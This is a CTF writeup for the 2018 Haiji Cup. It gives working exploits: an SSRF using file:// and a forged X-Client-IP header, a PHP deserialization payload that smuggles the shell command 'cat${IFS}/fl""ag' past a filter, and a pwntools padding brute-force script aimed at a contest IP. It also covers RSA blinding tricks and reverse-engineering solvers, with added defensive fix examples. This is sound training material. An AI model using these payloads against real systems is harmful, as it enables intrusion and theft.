
"骇极杯" (Haiji Cup) National College Student Cybersecurity Invitational WriteUp

安恒网络空间安全讲武堂
Published 2018-12-07 15:26:36

FIRST

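First-hand WriteUp for the "骇极杯" National College Student Cybersecurity Invitational

Special thanks to the author of this article: flam4nplus

The author has taken part in the "安恒杯" many times with outstanding results.

In this "骇极杯", his team achieved rank 7 and an AK (every challenge solved) in both re and crypto.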

~Congratulations!

Web

web1

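First, capture the traffic with Burp Suite.

Change GET to POST and post admin=1.

Visit robots.txt.

It lists source.php and flag.php.

Visiting flag.php gives nothing, so the only option is to look at source.php.

Here we can see that the IP has to be forged. Only a few headers are commonly used to forge an IP: xff (X-Forwarded-For), xci (X-Client-IP), clientip, remoteaddr.

Here, add X-Client-IP:127.0.0.1

Then continue by posting url.

Now we can see that an image is loaded.

I was stuck here for a long time, then it suddenly occurred to me that, since it is 127.0.0.1, the file protocol might work, so I tried it.

It still loads, and the screenshot above also shows that the result is html rather than a jpg, so fetch it with curl.

This also yielded the challenge source code: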

<?php
error_reporting(0);
include "flag.php";
echo "you need to login as admin!";
echo "<!-- post param  'admin' -->";
if(isset($_POST['admin']))
{
    if($_POST['admin']==1)
    {
        if($_SERVER['HTTP_X_CLIENT_IP'])
        {
            if(isset($_POST['url']) && parse_url($_POST['url'])['host']=='www.ichunqiu.com')
            {
                $curl = curl_init();
                curl_setopt($curl, CURLOPT_URL, $_POST['url']);
                curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
                $content = curl_exec($curl);
                curl_close($curl);
                $filename='download/'.rand().';img1.jpg';
                file_put_contents($filename,$content);
                echo $_POST['url'];
                $img="<img src=\"".$filename."\"/>";
                echo $img;
            }
            else
            {
                echo "you need post url: http://www.ichunqiu.com";
            }
        }
        else
        {
            echo "only 127.0.0.1 can get the flag!!";
        }
    }

}
else
{
    $_POST['admin']=0;
}

and the flag came along with it.
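The host comparison in source.php next to a stricter check, as an added example that is not part of the challenge or the original writeup. It is a Python stand-in for the PHP `parse_url` test; the function names, sample URLs and the offline resolver are constructed for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_HOST = "www.ichunqiu.com"      # the host source.php compares against
ALLOWED_SCHEMES = {"http", "https"}


def host_only_check(url):
    """Stand-in for the PHP test: only the host component is compared."""
    return urlsplit(url).hostname == ALLOWED_HOST


def strict_check(url, resolver=socket.getaddrinfo):
    """Accept only http(s) URLs for the expected host that resolve publicly."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False                   # file:// and other non-web schemes
    if parts.username is not None or parts.password is not None:
        return False                   # no userinfo in front of the host
    if parts.hostname != ALLOWED_HOST:
        return False
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
        infos = resolver(parts.hostname, port)
        addrs = [ipaddress.ip_address(info[4][0]) for info in infos]
    except (OSError, ValueError):
        return False                   # bad port, failed lookup, odd address
    # Refuse internal targets even when the name itself is on the allowlist.
    return bool(addrs) and all(a.is_global for a in addrs)


def fake_resolver(ip):
    """Constructed resolver so the example runs without network access."""
    return lambda host, port: [
        (socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, port))]


PUBLIC = fake_resolver("93.184.216.34")     # constructed sample address
LOOPBACK = fake_resolver("127.0.0.1")

SAMPLES = [                                  # constructed sample URLs
    "http://www.ichunqiu.com/logo.png",
    "file://www.ichunqiu.com/some/local/path",
    "http://user@www.ichunqiu.com/",
]


def demo():
    """Return (url, host-only verdict, strict verdict) for each sample."""
    return [(u, host_only_check(u), strict_check(u, PUBLIC)) for u in SAMPLES]


if __name__ == "__main__":
    for row in demo():
        print(row)
```

A production fetcher would also connect to the address it validated and refuse redirects. The `X-Client-IP` test in source.php has the same root problem: the header is supplied by the client, so it says nothing about where the request came from.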

web2

For this challenge, a scanning tool first turned up the leaked source code:

<?php
error_reporting(0);
class come{    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }           
    function echo($host){
        system("echo $host");
    }
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 

}

$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
        if($i===1)
        {
            $i++;   
            $$key = $value;
        }
        else{break;}
}
if($first==="doller")
{
    @parse_str($_GET['a']);
    if($var==="give")
    {
        if($bbb==="me")
        {
            if($ccc==="flag")
            {
                echo "<br>welcome!<br>";
                $come=@$_POST['come'];
                unserialize($come); 
            }
        }
        else
        {echo "<br>think about it<br>";}
    }
    else
    {
        echo "NO";
    }
}
else
{
    echo "Can you hack me?<br>";
}
?>

Next comes the deserialization vulnerability.

Just use Firefox F12 with HackBar:

http://8c2a8dee973d47ffbf0027140ec9e6dfc88e980052e84454.game.ichunqiu.com/?first=doller&a=var=give%26bbb=me%26ccc=flag

come=O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A20%3A%22123%26cat%24%7BIFS%7D%2Ffl%22%22ag%22%3B%7D%7D123

The flag is returned directly.
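Why the blocklist in `waf()` does not stop the argument carried in the payload above, next to an allowlist check and a shell-free call, as an added example that is not part of the challenge source. `waf` is a Python port of the PHP method; `HOST_RE`, `is_valid_host`, `leftover_metachars` and `safe_echo` are illustrative names, and `PAGE_ARG` is the `host` value URL-decoded from the payload on this page.

```python
import re
import subprocess

PAGE_ARG = '123&cat${IFS}/fl""ag'     # host value decoded from the page's payload

# Characters a POSIX shell treats specially (the blocklist covers only a few).
SHELL_META = set("&$`\"'\\(){}<>*;|?!#~\n ")

# Allowlist: letters, digits, dots and hyphens, starting with a letter or digit.
HOST_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")


def waf(s):
    """Python port of the challenge's waf(): strip listed characters and 'flag'."""
    s = re.sub(r"[<>*;|?\n ]", "", s)
    return s.replace("flag", "")


def leftover_metachars(s):
    """Shell metacharacters still present in s, sorted."""
    return sorted(set(s) & SHELL_META)


def is_valid_host(s):
    """Allowlist validation: accept only what a host name can contain."""
    return HOST_RE.fullmatch(s) is not None


def safe_echo(host):
    """Validate first, then pass the value as one argv element with no shell."""
    if not is_valid_host(host):
        raise ValueError("rejected host value")
    # The leading character is alphanumeric, so it cannot be read as an option.
    done = subprocess.run(["echo", host], capture_output=True,
                          text=True, check=True)
    return done.stdout


def demo():
    """Show that the filter leaves the page's argument untouched."""
    filtered = waf(PAGE_ARG)
    return filtered == PAGE_ARG, leftover_metachars(filtered), is_valid_host(PAGE_ARG)


if __name__ == "__main__":
    print(demo())
```

The filter only runs because `unserialize()` is called on request data in the first place; decoding untrusted input with a data-only format such as JSON removes the `__wakeup`/`__destruct` path entirely.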

Misc

Sign-in

Very simple base32; just decode it with an online tool.

MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q

easy-py

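I happened to set a challenge of this type before, but that writeup was too brief and I have forgotten most of the pyc bytecode. This time I quickly gathered the relevant material and saved it. Reference links:

https://github.com/python/cpython/blob/master/Include/opcode.h
https://bbs.pediy.com/thread-246683.htm
https://das.scusec.org/2017/03/24/pythonopcode/
http://unpyc.sourceforge.net/Opcodes.html

The opcodes, after tidying up, are as follows: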

03f3 0d0a 
bebc ce5b 
63
00 0000 00
00 000000
0f 0000 00
40 0000 00
73 
b200 0000  length 178
710600    JUMP_ABSOLUTE
642333    LOAD_CONST
710900    JUMP_ABSOLUTE       12 items
640000    LOAD_CONST  0   
640100    LOAD_CONST  1
640200    LOAD_CONST  2
640300    LOAD_CONST  3
640400    LOAD_CONST  4
640500    LOAD_CONST  5
640200    LOAD_CONST  2
640600    LOAD_CONST  6
640600    LOAD_CONST  6
640700    LOAD_CONST  7
640800    LOAD_CONST  8
640900    LOAD_CONST  9
640a00    LOAD_CONST  a
640b00    LOAD_CONST  b
640c00    LOAD_CONST  c


670f00    BUILD_LIST  f   cmp[0xf]
5a0000    STORE_NAME  0   
cmp[0xf]=[0,10,7,1,29,14,7,22,22,31,57,30,9,52,27]

650100    LOAD_NAME   1   raw_input
830000    CALL_FUNCTION   0
5a0200    STORE_NAME  2   flag

640000    LOAD_CONST  0   0
5a0300    STORE_NAME  3   m=0

{

785b00    SETUP_LOOP  while

650200    LOAD_NAME   2   flag
44        GET_ITER
5d5300    FOR_ITER
5a0400    STORE_NAME  4   i=..

650500    LOAD_NAME   5   ord
650400    LOAD_NAME   4   
830100    CALL_FUNCTION   ord(i)

0f         UNARY_INVERT  ~
640d00    LOAD_CONST  d       102
40        BINARY_AND  &

650500    LOAD_NAME   5
650400    LOAD_NAME   4
830100    CALL_FUNCTION   1 ord(i)
641200    LOAD_CONST  0x12    -103
40        BINARY_AND  &

42        BINARY_OR   |

5a0400    STORE_NAME  4   i=..
650400    LOAD_NAME   4   

650000    LOAD_NAME   0   cmp
650300     LOAD_NAME   3   m
19        BINARY_SUBSCR   []

6b0200    COMPARE_OP  2       ==  
7290 00    POP_JUMP_IF_FALSE

650300    LOAD_NAME   3   m
0b         UNARY_NEGATIVE -m
640e00    LOAD_CONST  0xe -1
17        BINARY_ADD  +
0b         UNARY_NEGATIVE -
5a0300    STORE_NAME  3   m=...

714900    JUMP_ABSOLUTE   

714900    JUMP_ABSOLUTE

640f00     LOAD_CONST  f wrong
47        PRINT_ITEM
48        PRINT_NEWLINE

650600    LOAD_NAME   6   exit
830000 CALL_FUNCTION    0
01        POP_TOP
714900 JUMP_ABSOLUTE
57        POP_BLOCK

641000    LOAD_CONST  right
47        PRINT_ITEM
48         PRINT_NEWLINE
641100
53        return


28        (STORE_SLICE
130000 00

69 
0000 0000 

69
0a 000000

69 
0700 0000 

69
0100 00 00
69 
1d00 0000 
69
0e00 00 00
69 
1600 0000 
69
1f 0000 00
69 
39000000 
69
1e 0000 00
69 
0900 0000 
69
34 000000
69 
1b00 0000 
69
66 0000 00
69 
ffff ffff

74
0500 00 00
7772 6f6e67 wrong
74
05 0000 00
7269 67 6874  right
4e69 99ff ffff 


28(
07 0000 00

74
0300 0000 
636d 70        cmp

74 
0900 0000 
7261 775f696e 7075 74 raw_input
74 
0400 0000 
666c 6167     flag
74
010000 00
6d             m
74
01 0000 00
69             i
74
03 0000 00
6f7264         ord

74
04 0000 00
65 7869 74    exit
)

28 
0000 0000

28
00 0000 00

28 
0000 0000 

73
0a 0000 00
65 6173 795f 7079 2e70 79    easy_py.py

74 
0800 0000 
3c6d 6f64 756c 653e     <module>

0100 0000 

73
14 0000 00
33 01 09 01 06 010d 011f 0110 010c 0106 0205 010b 02

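While working on this I hit a pitfall: the opcode tables found online are incomplete, so for a long time I did not know what the following two instructions were, and I was stuck on them for quite a while.

6b0200    COMPARE_OP  2       ==  
7290 00    POP_JUMP_IF_FALSE

The decryption script is as follows: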

cmp=[0,10,7,1,29,14,7,22,22,31,57,30,9,52,27]
flag=[]
j=0
for c in range(15):
    for i in range(255):
        if cmp[j] == ((~i)&102)|(i&(-103)):
            j=j+1
            flag.append(chr(i))
            break
print "".join(flag)

Pwn

aessss

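After obtaining the source, we found that the unpad function performs no check, so by manipulating unpad the flag can be brute-forced byte by byte from back to front until the whole flag is recovered.

The script is as follows: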

from pwn import * 
import base64, time, random, string
from Crypto.Cipher import AES
from Crypto.Hash import SHA256, MD5

#context.log_level = 'debug'

def choice1():
    p.sendline('1')
    p.recvuntil('Here is the encrypted flag: 0x', drop = True)
    enflag = p.recvuntil('\nWelcome to AES(WXH) encrypt system.', drop = True)
    #print enflag
    p.recvuntil('Your choice:', drop = True)
    return enflag

def choice2(pad):
    p.sendline('2')
    p.recvuntil('Pad me something:', drop = True)
    p.sendline(pad)
    p.recvuntil('Your choice:', drop = True)

def bypassproof():
    p.recvuntil('sha256(XXXX+')
    lastdata = p.recvuntil(')', drop=True)
    print lastdata
    p.recvuntil(' == ')
    digest = p.recvuntil('\nGive me XXXX:', drop=True)
    print digest
    def proof(s):
        return SHA256.new(s + lastdata).hexdigest() == digest
    data = pwnlib.util.iters.mbruteforce(proof, string.ascii_letters + string.digits, 4, method='fixed')
    print data
    p.sendline(data)
    #p.recvuntil('Done!\n')

p = remote('106.75.13.64', 54321)
bypassproof()
p.recvuntil('Your choice:', drop = True)
flag_enc = choice1()
#print encflag
flag = ""
for i in range(33):
    a = ''.join(['a' for _ in range(223)])
    a = a[:-1] + chr(224 + i)
    for c in string.printable:
        #print c+flag
        choice2(a)
        choice2(c+flag)
        if choice1() == flag_enc:
            flag = c + flag
            print "success:"+flag
            break
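What "unpad performs no check" means in code, next to a validating PKCS#7 unpad, as an added example that is not the challenge's source (which does not appear on this page). `unpad_unchecked` is an assumed shape for such a function; the block size, names and the tampered buffer are constructed, with the last byte 224 taken from the script above.

```python
import hmac

BLOCK = 16  # AES block size in bytes


def pad(data):
    """PKCS#7: append n bytes of value n, with 1 <= n <= BLOCK."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad_unchecked(data):
    """Assumed unchecked unpad: trust the last byte as the length to strip."""
    return data[:-data[-1]]


def unpad_checked(data):
    """Validate total length, pad length and every pad byte before stripping."""
    if not data or len(data) % BLOCK:
        raise ValueError("invalid padded length")
    n = data[-1]
    ok = 1 <= n <= BLOCK
    # Compare the whole pad in constant time; use a dummy length when n is bad.
    k = n if ok else BLOCK
    ok &= hmac.compare_digest(data[-k:], bytes([n]) * k)
    if not ok:
        raise ValueError("invalid padding")
    return data[:-n]


# Constructed 256-byte buffer whose final byte claims a 224-byte pad.
TAMPERED = b"A" * 255 + bytes([224])


def demo():
    """Return how much the unchecked version strips and what the checked one does."""
    stripped_to = len(unpad_unchecked(TAMPERED))
    try:
        unpad_checked(TAMPERED)
        verdict = "accepted"
    except ValueError as exc:
        verdict = str(exc)
    return stripped_to, verdict


if __name__ == "__main__":
    print(demo())
```

Rejecting bad padding is necessary but not sufficient: in modes such as CBC the error itself can become a padding oracle, so the ciphertext should be authenticated (encrypt-then-MAC or an AEAD mode) before any unpadding takes place.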

Crypto

rsaaaa

First, the proof of work has to be passed. The script is as follows:

import string
from hashlib import sha512

def brute_force(pad, shavalue):
    # Try every 4-character suffix over letters and digits (Python 2)
    dict = string.letters + string.digits
    key = ""
    for i1 in dict:
        tmp = key
        key1 = tmp + i1
        for i2 in dict:
            tmp = key1
            key2 = tmp + i2
            for i3 in dict:
                tmp = key2
                key3 = tmp + i3
                for i4 in dict:
                    tmp = key3
                    key4 = tmp + i4
                    final_key = key4
                    if sha512(pad+key4).hexdigest()==shavalue:
                        print key4
                        return key4
key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5')
print key_1

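Next, this stage has to be solved.

It turns out there is no need to solve for its d and n at all.

Simply use d=1 and n=c-m.

That leads straight into the next stage.

This stage requires some math: first compute cc = pow(2, e, n), then compute ccc = c*cc%n, then send ccc to the server for decryption, and divide the returned plaintext by 2.

The result is MM.

After posting it, do the AES decryption directly to get the flag.

The whole interaction is as follows: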

sha512(XkJ6v0Svif9H5wWd+XXXX) == 6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5

Tell me XXXX:
ZTmx
OK, you proof.
Give you a message:0x6f57434e74344a6a4831485177694169
and its ciphertext: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
Please give me the private key to decrypt cipher
n:
22084145559267142542278247205711206806769035096867203562084376236135074979071593494695165415304475011906014512427242327757399235206725659075262541485105057336477881466546208394134375073948200202231086452529564372313656850419369453050936175671378881331075871605986332054320133956210417108252203550155296981956383715305509205993100035845876676100308496728282263311014876821564144113735314621093460404122348973685951350134860330087006324081818356485787747916004167088733576488568724106608053548411305492271813170870510029120401564662767509523812680234467117029176109380429489145638460342248988331319677739729495421826415
d:
1
Oh, how you know the private key!
n=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
e=0xcf90945cb5ed1485
c=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

Now, you have a chance to decrypt something(but no c):
10861852131164322077412797986625616181717063053353581369663738748831496772954289381470035381197611133580693273961257855424019526480196780126545278666064266535981465755567420264745935227134754534350002537986969850551526328493939419096511440892423045037104987011041181269866090307965509267257918136812218547637066029308872688916113197541758600923169257485066711422003515732668822443487279464330075761022284709750952016470762309134261713817800958762289127439071427678699871872454105477099012449462911427691966935866152040055058801656487819090362844926572779942769475645537130146301058513228439997764047914117721832371520
message:0xce6adae4ac9ec86c8ee264a28ae2a46e
Give me right message:
137187895140717694653920589162394767927
Master in math!
Here is your flag:0x4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0

The exp is as follows:

#!/usr/bin/python
import random
import string
from hashlib import sha512
from Crypto.Util.number import *
from Crypto.Cipher import AES

'''
def brute_force(pad, shavalue):
    dict = string.letters + string.digits
    key = ""
    for i1 in dict:
        tmp = key
        key1 = tmp + i1
        for i2 in dict:
            tmp = key1
            key2 = tmp + i2
            for i3 in dict:
                tmp = key2
                key3 = tmp + i3
                for i4 in dict:
                    tmp = key3
                    key4 = tmp + i4
                    final_key = key4
                    if sha512(pad+key4).hexdigest()==shavalue:
                        print key4
                        return key4
key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5')
print key_1


m = 0x6f57434e74344a6a4831485177694169
c = 0xaef0ac66619ad00415bdf53f3232fffb1e19be5ae92b187f98544187f4021d9192b731f3bdedcf024310e918b6dcf052c6c13bca7587650806bcabcba0943ada57abfe8ec6aed1749ebf35d6c1716fd40c5fed105f1604caed170421b2e12efcb174b38bf2427331e2a22bdd4731c004c4d714a3a593b2cd0fd0031968526a4420ff2adfc0b752ddf9c2381e8cfd98f0471e820ee5ee8b83955730bc1087b12151ce0c65b4a90b84555c12db8053429ee6c40e7977b087829bec0e7dc42632d9c16a162500893ac635e3b6c4e1d3e34f069cbdc8183c19a28e400751ae1c9168d0689c0162ce59852170394eb881ab99130a4837422e5081143a2b62a3bc76d8

print c-m





n=0xac53a7e7f4a8ddb0d52b6df045527551d541a40365116ae66e9d8709442ffcfd786a8df7d203e117a709553d510edece5ae72c8e6f9a9552b4be987e6f2021f2a339930cdb221a8d484ea09df63c2a55f582b3c9ade2912c9650786e9f5c82973e2baea122cb895d06fa174a106d4660740f0c204666dc69168e330b2c41a78633bf24d48d023a6c0bdfa2f3761c4f38d081b5bf8c9ffd11abbe4d5be6e63f064125b3ead319c09242f5366124a0bfc8f73ba11a067a7904fec9c5497b3f376382427e3e60e95ae747cce634d721009cd13350b1cf2383c6880c05ff8ec7824339ea438ea800b5d15ec05fd0df7e53c569e1951560a75eb289f3afdf19beded1
e=0xcf90945cb5ed1485
c=0x9a9c94ec0094c5e3c1e1b6c2b534b637726cba2e8b0da0a2ba3f12cb98a225206755f13a7ae3e459489e253a6b4719645d741a48d3b47184a2bc8cc6be73b4040443821dc7796754cf5f40c3d9845f15f23486d50d06fdbcde6c017599703ac9ec6015ae61b67379f48272f4f84491506bc3e56eaf124c9b14584330657a26b4cc009c489441cafc3ed5555ff2f5806a5b56eb0d312dfea2ad985e37b5a3917f7930b492331bc1e12f71949ae7d76c53a44c5d9f7d25e8856aafd69f3b6bcfb44e5cf2fa9c09aa35bf4b6566c89f174d0c68abd8970aa41e1fe441c4b38c705979e33d5c9a2abf15560477c31b6346fcfc723289b9751f893fb7a8dac47de3f0

cc = pow(2,e,n)
ccc = c*cc%n
print ccc

m = 0xce6adae4ac9ec86c8ee264a28ae2a46e

print m/2

'''
enc_flag = '4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0'
enc_flag = enc_flag.decode('hex')
msg1 = '6f57434e74344a6a4831485177694169'.decode('hex')
msg2 = '67356d72564f64364771325145715237'.decode('hex')
cipher = AES.new(msg2, AES.MODE_CBC, msg1)
dec = cipher.decrypt(enc_flag)

print dec
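The two RSA steps described above, worked through on a toy key as an added example (Python 3.8+, not the author's exp). `key_check` and `decrypt_oracle` model the server's behaviour as it appears in the transcript and are assumptions; the primes, message and function names are constructed. `unblind` generalises the page's divide-by-2 to a modular inverse, so it also holds when s*m exceeds n.

```python
# Constructed toy key built from two Mersenne primes; real keys are far larger.
P, Q, E = 2**31 - 1, 2**61 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))

M = int.from_bytes(b"sample", "big")   # constructed sample message
C = pow(M, E, N)                       # textbook (unpadded) RSA ciphertext


def key_check(m, c, n, d):
    """Assumed stage-1 check: accept any (n, d) for which c^d mod n == m."""
    return pow(c, d, n) == m


def key_check_fixed(m, c, n, d):
    """Same check, but the modulus must be the server's own."""
    return n == N and pow(c, d, n) == m


def decrypt_oracle(x, forbidden):
    """Assumed stage-2 oracle: decrypts anything except the target ciphertext."""
    if x % N == forbidden % N:
        raise ValueError("refusing to decrypt the target ciphertext")
    return pow(x, D, N)


def unblind(c, s=2):
    """Unpadded RSA is multiplicative: Dec(c * s^e) = s * m (mod n)."""
    blinded = c * pow(s, E, N) % N
    return decrypt_oracle(blinded, c) * pow(s, -1, N) % N


def demo():
    """Return the outcome of each step on the toy key."""
    return {
        # c mod (c - m) equals m whenever c > 2m, so d = 1 passes the check.
        "stage1_any_modulus": key_check(M, C, C - M, 1),
        "stage1_bound_modulus": key_check_fixed(M, C, C - M, 1),
        # The oracle hands back 2m for the blinded ciphertext, as on the page.
        "stage2_doubled": decrypt_oracle(C * pow(2, E, N) % N, C) == 2 * M,
        "stage2_recovered": unblind(C) == M,
    }


if __name__ == "__main__":
    print(demo())
```

`key_check_fixed` shows the stage-1 repair: the check is bound to the server's own modulus. The stage-2 malleability goes away when messages are encrypted with a padding scheme such as OAEP instead of raw RSA.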

Reverse

cpp

Basically a sign-in challenge; with a little knowledge of C++ it will not feel so unfamiliar.

fake=[0x99, 0xb0, 0x87, 0x9e, 0x70, 0xe8, 0x41, 0x44, 0x05, 0x04, 0x8b, 0x9a, 0x74, 0xbc, 0x55, 0x58, 0xb5, 0x61, 0x8e, 0x36, 0xac, 0x09, 0x59, 0xe5,
 0x61, 0xdd, 0x3e, 0x3f, 0xb9, 0x15, 0xed, 0xd5]
a = 0x99
b = 0xb0
c = 0x87
d = 0x9e
flag=[]

src=[0 for i in range(32)]
xor1=[0 for i in range(32)]
xor2=[0 for i in range(32)]
xor3=[0 for i in range(32)]
xor4=[0 for i in range(32)]
src[0]=a
src[1]=b
src[2]=c
src[3]=d

xor1[0]=a
xor1[1]=b^a
xor1[2]=a^b^c
xor1[3]=a^b^c^d

xor2[0]=a
xor2[1]=b
xor2[2]=a^c
xor2[3]=d^b

xor3[0]=a
xor3[1]=a^b
xor3[2]=c^b
xor3[3]=d^c

xor4[0]=a
xor4[1]=b
xor4[2]=c
xor4[3]=d

for i in range(4,32):
    for j in range(256):
        src[i]=j
        xor1[i]=(xor1[i-1]^src[i])&0xff
        xor2[i]=(xor2[i-1]^xor1[i])&0xff
        xor3[i]=(xor3[i-1]^xor2[i])&0xff
        xor4[i]=(xor4[i-1]^xor3[i])&0xff
        if xor4[i]==fake[i]:
            break

for i in range(32):
    for j in range(256):
        tmp = j*4
        result = (((j>>6)|tmp)^i)&0xff
        if result == src[i]:
            flag.append(chr(j))
            break
print "".join(flag)#flag{W0w_y0u_m4st3r_C_p1us_p1us}

flag{W0w_y0u_m4st3r_C_p1us_p1us}

cyvm

Released only near the end; a very simple VM challenge. The bytecode is as follows:

op    d1  d2
[0x0F,                      scanf(%s)   s
0x10, 0x14, 0x20,            r0=0x20
0x10, 0x16, 0x00,             r2=0
0x09, 0x24,                 point=0x24  jmp code[0x24]
label code[0x9]:
0x02, 0x15, 0x16,             r1=s[r2]            r2=0    r1=s[0]
0xE9,                         ++i
0x12, 0x16,                 v2 = 2  r2++        r2=1
0xE8,                         ++i
0x02, 0x17, 0x16,             r3=s[r2]                    r3=s[1]
0x13, 0x16,                 v3 = 2  r2--        r2=0
0x90,                         ++i
0x06, 0x15, 0x17,             r1=r1^r3            r1=s[0]^s[1]
0x45,                         ++i
0x06, 0x15, 0x16,             r1=r1^r2            r1=s[0]^s[1]^r2
0x76,                         ++i
0x01, 0x15, 0x16,             s[r1]=r2            s[r1]=0
0x12, 0x16,                 v2=2    r2++
0xFF,                         ++i

label code[0x24]:
0x0A, 0x14, 0x16,            v9  = r0 != r2

0x0C, 0x09,                    if(v9) true point = d1
0x0E                        sub_4006d6()!=0

Decryption script:

c = [0x0A, 0x0C, 0x04, 0x1F, 0x48, 0x5A, 0x5F, 0x03, 0x62, 0x67, 0x0E, 0x61, 0x1E, 0x19, 0x08, 0x36, 0x47, 0x52, 0x13, 0x57, 0x7C, 0x39, 0x54, 0x4B, 0x05, 0x05, 0x45, 0x77, 0x15, 0x26, 0x0E, 0x62]


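# flag=[]
def encode():
    # What the VM does to the input: c[i] = s[i] ^ s[i+1] ^ i for i in 0..31.
    # s[32] is the string's NUL terminator, consistent with c[31] == ord('}') ^ 31.
    flag='a'*0x20+'\x00'
    for i in range(32):
        c[i]=ord(flag[i])^ord(flag[i+1])^i


def decode():
    # Walk backwards from the known last character '}' (125)
    flag=["}"]
    tmp = 125
    for i in range(30,-1,-1):
        tmp = c[i]^tmp^i
        flag.append(chr(tmp))
    print "".join(flag[::-1])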

decode()

flag{7h15_15_MY_f1rs7_s1mpl3_Vm}

What's_it

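The first part is an MD5 brute force over 6 characters from a-z, which yields the luck string ozulmt. The program then enters a self-decoding section, and only after that comes the part that really verifies the flag: it first checks the flag format, extracts the content after formatting, and finally compares it with fixed data. The brute-force script is as follows: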

import hashlib
import string
dic = string.ascii_lowercase
may_fla = []
for i in dic:
    for j in dic:
        for m in dic:
            for n in dic:
                for p in dic:
                    for q in dic:
                        flag=i+j+m+n+p+q
                        # print flag
                        hl = hashlib.md5()
                        hl.update(flag.encode(encoding='utf-8'))
                        flag_md5 = hl.hexdigest()
                        count=0
                        index_sum=0
                        for c in range(32):
                            if flag_md5[c] == '0':
                                count = count+1
                                index_sum = index_sum+c
                        if (10*count+index_sum) == 403:
                            may_fla.append(flag)
print may_fla

The decryption script is as follows:

# flag{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}
# flag="flag{"
# flag[13]="-"
# flag[18]="-"
# flag[28]="-"
# flag[23]="-"
# flag[41]="}"

c=[0x61, 0x31, 0x39, 0x37, 0x62, 0x38, 0x34, 0x37, 0x37, 0x30, 0x39, 0x32, 0x35, 0x33, 0x61, 0x34, 0x37, 0x63, 0x34, 0x31, 0x62, 0x63, 0x37, 0x64, 0x36, 0x64, 0x35, 0x32, 0x65, 0x36, 0x39, 0x64]
flag = []

for i in c:
    flag.append(chr(i))
print "".join(flag)# flag{a197b847-7092-53a4-7c41-bc7d6d52e69d}

Originally published: 2018-11-07

This article is shared from the 恒星EDU WeChat official account.
